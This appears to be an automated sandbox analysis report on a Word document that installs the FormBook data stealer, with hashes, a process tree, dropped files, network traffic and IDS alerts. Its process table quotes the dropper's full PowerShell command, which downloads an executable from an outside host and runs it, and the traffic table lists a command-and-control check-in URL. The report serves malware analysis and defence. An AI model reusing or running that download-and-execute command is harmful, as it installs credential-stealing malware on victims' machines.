Field | Value
---|---
File name: | bd1ea5a86228a93a63041dbb1b7336b34dc27828e1da86d570dec1eaf80418a5.doc
Full analysis: | https://app.any.run/tasks/35f1eb4c-891c-4d38-a44d-17ac86d0b03b
Verdict: | Malicious activity
Threats: | FormBook is a data stealer that is distributed as MaaS. FormBook differs from much of the competing malware by its extreme ease of use, which allows even inexperienced threat actors to use the FormBook virus.
Analysis date: | March 21, 2019, 03:18:30
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: |
Indicators: |
MIME: | application/msword
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: HP PC, Template: Order#0281-17pallet.doc, Last Saved By: HP PC, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Mar 20 08:57:00 2019, Last Saved Time/Date: Wed Mar 20 08:57:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5: | 9AFDF05DC6FB614E5C37BAFA0351E785
SHA1: | 08CC487B7C0DBA442F3FD035569602E30EF3824F
SHA256: | BD1EA5A86228A93A63041DBB1B7336B34DC27828E1DA86D570DEC1EAF80418A5
SSDEEP: | 6144:tNxvZS3Y/r5E0BLLY5iAB5pxDytvuKTe6dp41H285QutY5WeCJK5b:tXvsOr5rL+iAzGWap41H285QutY5WeC0
Extension | Description
---|---
.doc | Microsoft Word document (80)

Property | Value
---|---
CompObjUserType: | Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: | 39
HeadingPairs: |
TitleOfParts: | -
HyperlinksChanged: | No
SharedDoc: | No
LinksUpToDate: | No
ScaleCrop: | No
AppVersion: | 12
CharCountWithSpaces: | 1
Paragraphs: | 1
Lines: | 1
Company: | -
CodePage: | Windows Latin 1 (Western European)
Security: | None
Characters: | 1
Words: | -
Pages: | 1
ModifyDate: | 2019:03:20 08:57:00
CreateDate: | 2019:03:20 08:57:00
TotalEditTime: | 1.0 minutes
Software: | Microsoft Office Word
RevisionNumber: | 2
LastModifiedBy: | HP PC
Template: | Order#0281-17pallet.doc
Author: | HP PC
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
1844 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bd1ea5a86228a93a63041dbb1b7336b34dc27828e1da86d570dec1eaf80418a5.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000
2456 | cmd /c POwErshEll(New-Object System.Net.WebClient).DownloadFile('http://prescient-inc.com/top/Lesth.exe','%temp%\ffydhvne.exe');start %temp%\ffydhvne.exe | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1548 | POwErshEll (New-Object System.Net.WebClient).DownloadFile('http://prescient-inc.com/top/Lesth.exe','C:\Users\admin\AppData\Local\Temp\ffydhvne.exe');start C:\Users\admin\AppData\Local\Temp\ffydhvne.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3432 | "C:\Users\admin\AppData\Local\Temp\ffydhvne.exe" | C:\Users\admin\AppData\Local\Temp\ffydhvne.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: ChildDlgTest MFC Application; Exit code: 0; Version: 1, 0, 0, 1
2856 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
4072 | /c del "C:\Users\admin\AppData\Local\Temp\ffydhvne.exe" | C:\Windows\System32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1696 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2128 | C:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09} | C:\Windows\system32\DllHost.exe | | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: COM Surrogate; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2620 | "C:\Program Files\Ox4ax6tth\userc8t.exe" | C:\Program Files\Ox4ax6tth\userc8t.exe | — | explorer.exe | User: admin; Integrity Level: MEDIUM; Description: ChildDlgTest MFC Application; Version: 1, 0, 0, 1
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9AC0.tmp.cvr | — | — | —
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2OYTG81VQGYU3OX1Y9EB.temp | — | — | —
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF1A827AA7850534A9.TMP | — | — | —
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5704C60F-F484-40D6-BE50-EE0A302842AE}.tmp | — | — | —
1844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5F64299C-84A5-4683-AE57-5A4617D39C15}.tmp | — | — | —
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1548 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfac06.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2856 | cmd.exe | C:\Users\admin\AppData\Roaming\O3-9N7-E\O3-logrc.ini | binary | 2855A82ECDD565B4D957EC2EE05AED26 | 88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939
1844 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | A3D37A96BE99E1B37F142EAB31105E77 | 10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0
1548 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ffydhvne.exe | executable | 7DDA33F6D9FC6FFDE00B21D97BB5644C | 2B5B2B7A6F2BAD9D2C68F51E3DF54947863227E0DA2BB908CBBA196C9D8AC69B
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1696 | explorer.exe | GET | 301 | 104.28.28.142:80 | http://www.taraftarium241.com/ma/?9rr=ozra198NBRIZr0gm3yaAtsQlOeCRG4e+mJua2MSt8bjGVmJ3SAyL8rTM28eLXyqALa53ug==&Otcl=wZ10dx48cnyhHRd | US | html | 343 b | shared |
1548 | powershell.exe | GET | 200 | 103.21.59.25:80 | http://prescient-inc.com/top/Lesth.exe | IN | executable | 440 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1696 | explorer.exe | 104.28.28.142:80 | www.taraftarium241.com | Cloudflare Inc | US | shared |
1548 | powershell.exe | 103.21.59.25:80 | prescient-inc.com | PDR | IN | malicious |
Domain | IP | Reputation
---|---|---
prescient-inc.com | | suspicious
www.taraftarium241.com | | unknown
PID | Process | Class | Message |
---|---|---|---|
1548 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1548 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1696 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |